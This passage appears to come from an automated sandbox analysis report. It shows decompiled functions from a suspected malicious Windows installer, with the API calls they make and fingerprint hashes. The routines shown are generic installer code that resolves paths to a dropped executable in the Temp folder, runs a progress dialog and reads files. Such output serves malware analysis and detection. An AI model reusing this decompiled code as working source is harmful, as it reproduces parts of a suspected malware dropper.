                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                    • DeleteObject.GDI32(?), ref: 00401165
                    • EndPaint.USER32(?,?), ref: 0040116E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F
                    • API String ID: 941294808-1304234792
                    • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                    • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
                    • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                    • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                    				struct _ITEMIDLIST* _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _t44;
                    				WCHAR* _t45;
                    				signed char _t47;
                    				signed int _t48;
                    				short _t59;
                    				short _t61;
                    				short _t63;
                    				void* _t71;
                    				signed int _t77;
                    				signed int _t78;
                    				short _t81;
                    				short _t82;
                    				signed char _t84;
                    				signed int _t85;
                    				void* _t98;
                    				void* _t104;
                    				intOrPtr* _t105;
                    				void* _t107;
                    				WCHAR* _t108;
                    				void* _t110;
                    
                    				_t107 = __esi;
                    				_t104 = __edi;
                    				_t71 = __ebx;
                    				_t44 = _a8;
                    				if(_t44 < 0) {
                    					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
                    				}
                    				_push(_t71);
                    				_push(_t107);
                    				_push(_t104);
                    				_t105 =  *0x7a8ad8 + _t44 * 2;
                    				_t45 = 0x7a6a40;
                    				_t108 = 0x7a6a40;
                    				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
                    					_t108 = _a4;
                    					_a4 = _a4 & 0x00000000;
                    				}
                    				_t81 =  *_t105;
                    				_a8 = _t81;
                    				if(_t81 == 0) {
                    					L43:
                    					 *_t108 =  *_t108 & 0x00000000;
                    					if(_a4 == 0) {
                    						return _t45;
                    					}
                    					return E0040666E(_a4, _t45);
                    				} else {
                    					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                    						_t98 = 2;
                    						_t105 = _t105 + _t98;
                    						if(_t81 >= 4) {
                    							if(__eflags != 0) {
                    								 *_t108 = _t81;
                    								_t108 = _t108 + _t98;
                    								__eflags = _t108;
                    							} else {
                    								 *_t108 =  *_t105;
                    								_t108 = _t108 + _t98;
                    								_t105 = _t105 + _t98;
                    							}
                    							L42:
                    							_t82 =  *_t105;
                    							_a8 = _t82;
                    							if(_t82 != 0) {
                    								_t81 = _a8;
                    								continue;
                    							}
                    							goto L43;
                    						}
                    						_t84 =  *((intOrPtr*)(_t105 + 1));
                    						_t47 =  *_t105;
                    						_t48 = _t47 & 0x000000ff;
                    						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                    						_t85 = _t84 & 0x000000ff;
                    						_v28 = _t48 | 0x00008000;
                    						_t77 = 2;
                    						_v16 = _t85;
                    						_t105 = _t105 + _t77;
                    						_v24 = _t48;
                    						_v20 = _t85 | 0x00008000;
                    						if(_a8 != _t77) {
                    							__eflags = _a8 - 3;
                    							if(_a8 != 3) {
                    								__eflags = _a8 - 1;
                    								if(__eflags == 0) {
                    									__eflags = (_t48 | 0xffffffff) - _v12;
                    									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                    								}
                    								L38:
                    								_t108 =  &(_t108[lstrlenW(_t108)]);
                    								_t45 = 0x7a6a40;
                    								goto L42;
                    							}
                    							_t78 = _v12;
                    							__eflags = _t78 - 0x1d;
                    							if(_t78 != 0x1d) {
                    								__eflags = (_t78 << 0xb) + 0x7a9000;
                    								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
                    							} else {
                    								E004065B5(_t108,  *0x7a8aa8);
                    							}
                    							__eflags = _t78 + 0xffffffeb - 7;
                    							if(__eflags < 0) {
                    								L29:
                    								E004068F5(_t108);
                    							}
                    							goto L38;
                    						}
                    						if( *0x7a8b24 != 0) {
                    							_t77 = 4;
                    						}
                    						_t121 = _t48;
                    						if(_t48 >= 0) {
                    							__eflags = _t48 - 0x25;
                    							if(_t48 != 0x25) {
                    								__eflags = _t48 - 0x24;
                    								if(_t48 == 0x24) {
                    									GetWindowsDirectoryW(_t108, 0x400);
                    									_t77 = 0;
                    								}
                    								while(1) {
                    									__eflags = _t77;
                    									if(_t77 == 0) {
                    										goto L26;
                    									}
                    									_t59 =  *0x7a8aa4;
                    									_t77 = _t77 - 1;
                    									__eflags = _t59;
                    									if(_t59 == 0) {
                    										L22:
                    										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                    										__eflags = _t61;
                    										if(_t61 != 0) {
                    											L24:
                    											 *_t108 =  *_t108 & 0x00000000;
                    											__eflags =  *_t108;
                    											continue;
                    										}
                    										__imp__SHGetPathFromIDListW(_v8, _t108);
                    										_a8 = _t61;
                    										__imp__CoTaskMemFree(_v8);
                    										__eflags = _a8;
                    										if(_a8 != 0) {
                    											goto L26;
                    										}
                    										goto L24;
                    									}
                    									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                    									__eflags = _t63;
                    									if(_t63 == 0) {
                    										goto L26;
                    									}
                    									goto L22;
                    								}
                    								goto L26;
                    							}
                    							GetSystemDirectoryW(_t108, 0x400);
                    							goto L26;
                    						} else {
                    							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                    							if( *_t108 != 0) {
                    								L27:
                    								if(_v16 == 0x1a) {
                    									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                    								}
                    								goto L29;
                    							}
                    							E004066AB(_t77, _t105, _t108, _t108, _v16);
                    							L26:
                    							if( *_t108 == 0) {
                    								goto L29;
                    							}
                    							goto L27;
                    						}
                    					}
                    					goto L43;
                    				}
                    			}





























                    0x00406780
                    0x0040679e
                    0x004067a7
                    0x00406844
                    0x00406848
                    0x00406850
                    0x00406850
                    0x00000000
                    0x00406848
                    0x004067b1
                    0x0040683e
                    0x00406842
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406842
                    0x0040677e
                    0x00000000
                    0x0040670b

                    APIs
                    • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000400), ref: 004067C6
                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Directory$SystemWindowslstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                    • API String ID: 4260037668-3252758465
                    • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                    • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
                    • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                    • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                    				struct tagLOGBRUSH _v16;
                    				long _t39;
                    				long _t41;
                    				void* _t44;
                    				signed char _t50;
                    				long* _t54;
                    
                    				if(_a4 + 0xfffffecd > 5) {
                    					L18:
                    					return 0;
                    				}
                    				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                    				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                    					goto L18;
                    				} else {
                    					_t50 = _t54[5];
                    					if((_t50 & 0xffffffe0) != 0) {
                    						goto L18;
                    					}
                    					_t39 =  *_t54;
                    					if((_t50 & 0x00000002) != 0) {
                    						_t39 = GetSysColor(_t39);
                    					}
                    					if((_t54[5] & 0x00000001) != 0) {
                    						SetTextColor(_a8, _t39);
                    					}
                    					SetBkMode(_a8, _t54[4]);
                    					_t41 = _t54[1];
                    					_v16.lbColor = _t41;
                    					if((_t54[5] & 0x00000008) != 0) {
                    						_t41 = GetSysColor(_t41);
                    						_v16.lbColor = _t41;
                    					}
                    					if((_t54[5] & 0x00000004) != 0) {
                    						SetBkColor(_a8, _t41);
                    					}
                    					if((_t54[5] & 0x00000010) != 0) {
                    						_v16.lbStyle = _t54[2];
                    						_t44 = _t54[3];
                    						if(_t44 != 0) {
                    							DeleteObject(_t44);
                    						}
                    						_t54[3] = CreateBrushIndirect( &_v16);
                    					}
                    					return _t54[3];
                    				}
                    			}










                    APIs
                    • GetWindowLongW.USER32(?,000000EB), ref: 0040464E
                    • GetSysColor.USER32(00000000), ref: 0040468C
                    • SetTextColor.GDI32(?,00000000), ref: 00404698
                    • SetBkMode.GDI32(?,?), ref: 004046A4
                    • GetSysColor.USER32(?), ref: 004046B7
                    • SetBkColor.GDI32(?,?), ref: 004046C7
                    • DeleteObject.GDI32(?), ref: 004046E1
                    • CreateBrushIndirect.GDI32(?), ref: 004046EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                    • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                    • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				intOrPtr _t72;
                    				void* _t76;
                    				void* _t79;
                    
                    				_t72 = __edx;
                    				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                    				_t65 = 2;
                    				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                    				_t66 = E00402D84(_t65);
                    				_t79 = _t66 - 1;
                    				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                    				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                    				if(_t79 < 0) {
                    					L36:
                    					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
                    				} else {
                    					__ecx = 0x3ff;
                    					if(__eax > 0x3ff) {
                    						 *(__ebp - 0x44) = 0x3ff;
                    					}
                    					if( *__edi == __bx) {
                    						L34:
                    						__ecx =  *(__ebp - 0xc);
                    						__eax =  *(__ebp - 8);
                    						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                    						if(_t79 == 0) {
                    							 *(_t76 - 4) = 1;
                    						}
                    						goto L36;
                    					} else {
                    						 *(__ebp - 0x38) = __ebx;
                    						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
                    						if( *(__ebp - 0x44) > __ebx) {
                    							do {
                    								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                    									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
                    										__eax = __ebp - 0x50;
                    										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                    											goto L34;
                    										} else {
                    											goto L21;
                    										}
                    									} else {
                    										goto L34;
                    									}
                    								} else {
                    									__eax = __ebp - 0x40;
                    									_push(__ebx);
                    									_push(__ebp - 0x40);
                    									__eax = 2;
                    									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                    									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                    									if(__eax == 0) {
                    										goto L34;
                    									} else {
                    										__ecx =  *(__ebp - 0x40);
                    										if(__ecx == __ebx) {
                    											goto L34;
                    										} else {
                    											__ax =  *(__ebp + 0xa) & 0x000000ff;
                    											 *(__ebp - 0x4c) = __ecx;
                    											 *(__ebp - 0x50) = __eax;
                    											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                    												L28:
                    												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
                    											} else {
                    												__ebp - 0x50 = __ebp + 0xa;
                    												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                    													L21:
                    													__eax =  *(__ebp - 0x50);
                    												} else {
                    													__edi =  *(__ebp - 0x4c);
                    													__edi =  ~( *(__ebp - 0x4c));
                    													while(1) {
                    														_t22 = __ebp - 0x40;
                    														 *_t22 =  *(__ebp - 0x40) - 1;
                    														__eax = 0xfffd;
                    														 *(__ebp - 0x50) = 0xfffd;
                    														if( *_t22 == 0) {
                    															goto L22;
                    														}
                    														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                    														__edi = __edi + 1;
                    														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                    														__eax = __ebp + 0xa;
                    														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                    															continue;
                    														} else {
                    															goto L21;
                    														}
                    														goto L22;
                    													}
                    												}
                    												L22:
                    												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                    													goto L28;
                    												} else {
                    													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                    														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                    															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                    															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                    														} else {
                    															__ecx =  *(__ebp - 0xc);
                    															__edx =  *(__ebp - 8);
                    															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                    															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                    														}
                    														goto L34;
                    													} else {
                    														__ecx =  *(__ebp - 0xc);
                    														__edx =  *(__ebp - 8);
                    														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                    														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                    														 *(__ebp - 0x38) = __eax;
                    														if(__ax == __bx) {
                    															goto L34;
                    														} else {
                    															goto L26;
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    								goto L37;
                    								L26:
                    								__eax =  *(__ebp - 8);
                    							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                    						}
                    						goto L34;
                    					}
                    				}
                    				L37:
                    				return 0;
                    			}









                    APIs
                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                      • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: File$Pointer$ByteCharMultiWide$Read
                    • String ID: 9
                    • API String ID: 163830602-2366072709
                    • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                    • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
                    • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                    • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004056D0(signed int _a4, WCHAR* _a8) {
                    				struct HWND__* _v8;
                    				signed int _v12;
                    				WCHAR* _v32;
                    				long _v44;
                    				int _v48;
                    				void* _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				WCHAR* _t27;
                    				signed int _t28;
                    				long _t29;
                    				signed int _t37;
                    				signed int _t38;
                    
                    				_t27 =  *0x7a7a84;
                    				_v8 = _t27;
                    				if(_t27 != 0) {
                    					_t37 =  *0x7a8b54;
                    					_v12 = _t37;
                    					_t38 = _t37 & 0x00000001;
                    					if(_t38 == 0) {
                    						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
                    					}
                    					_t27 = lstrlenW(0x7a0f68);
                    					_a4 = _t27;
                    					if(_a8 == 0) {
                    						L6:
                    						if((_v12 & 0x00000004) == 0) {
                    							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
                    						}
                    						if((_v12 & 0x00000002) == 0) {
                    							_v32 = 0x7a0f68;
                    							_v52 = 1;
                    							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                    							_v44 = 0;
                    							_v48 = _t29 - _t38;
                    							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                    							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                    						}
                    						if(_t38 != 0) {
                    							_t28 = _a4;
                    							0x7a0f68[_t28] = 0;
                    							return _t28;
                    						}
                    					} else {
                    						_t27 = lstrlenW(_a8) + _a4;
                    						if(_t27 < 0x1000) {
                    							_t27 = lstrcatW(0x7a0f68, _a8);
                    							goto L6;
                    						}
                    					}
                    				}
                    				return _t27;
                    			}


















                    APIs
                    • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                    • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                    • lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                    • SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                      • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                      • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                    • String ID:
                    • API String ID: 1495540970-0
                    • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                    • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
                    • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                    • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E004068F5(WCHAR* _a4) {
                    				short _t5;
                    				short _t7;
                    				WCHAR* _t19;
                    				WCHAR* _t20;
                    				WCHAR* _t21;
                    
                    				_t20 = _a4;
                    				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                    					_t20 =  &(_t20[4]);
                    				}
                    				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
                    					_t20 =  &(_t20[2]);
                    				}
                    				_t5 =  *_t20;
                    				_t21 = _t20;
                    				_t19 = _t20;
                    				if(_t5 != 0) {
                    					do {
                    						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
                    							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                    							_t19 = CharNextW(_t19);
                    						}
                    						_t20 = CharNextW(_t20);
                    						_t5 =  *_t20;
                    					} while (_t5 != 0);
                    				}
                    				 *_t19 =  *_t19 & 0x00000000;
                    				while(1) {
                    					_push(_t19);
                    					_push(_t21);
                    					_t19 = CharPrevW();
                    					_t7 =  *_t19;
                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                    						break;
                    					}
                    					 *_t19 =  *_t19 & 0x00000000;
                    					if(_t21 < _t19) {
                    						continue;
                    					}
                    					break;
                    				}
                    				return _t7;
                    			}









                    APIs
                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
                    • CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
                    • CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
                    • CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 589700163-2982765560
                    • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                    • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
                    • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                    • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040302E(intOrPtr _a4) {
                    				short _v132;
                    				long _t6;
                    				struct HWND__* _t7;
                    				struct HWND__* _t15;
                    
                    				if(_a4 != 0) {
                    					_t15 =  *0x79f73c;
                    					if(_t15 != 0) {
                    						_t15 = DestroyWindow(_t15);
                    					}
                    					 *0x79f73c = 0;
                    					return _t15;
                    				}
                    				if( *0x79f73c != 0) {
                    					return E00406A77(0);
                    				}
                    				_t6 = GetTickCount();
                    				if(_t6 >  *0x7a8aac) {
                    					if( *0x7a8aa8 == 0) {
                    						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
                    						 *0x79f73c = _t7;
                    						return ShowWindow(_t7, 5);
                    					}
                    					if(( *0x7a8b54 & 0x00000001) != 0) {
                    						wsprintfW( &_v132, L"... %d%%", E00403012());
                    						return E004056D0(0,  &_v132);
                    					}
                    				}
                    				return _t6;
                    			}








                    APIs
                    • DestroyWindow.USER32(?,00000000), ref: 00403049
                    • GetTickCount.KERNEL32 ref: 00403067
                    • wsprintfW.USER32 ref: 00403095
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                      • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                      • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                    • CreateDialogParamW.USER32 ref: 004030B9
                    • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                      • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                    • String ID: ... %d%%
                    • API String ID: 722711167-2449383134
                    • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                    • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
                    • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                    • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
                    				long _v8;
                    				signed char _v12;
                    				unsigned int _v16;
                    				void* _v20;
                    				intOrPtr _v24;
                    				long _v56;
                    				void* _v60;
                    				long _t15;
                    				unsigned int _t19;
                    				signed int _t25;
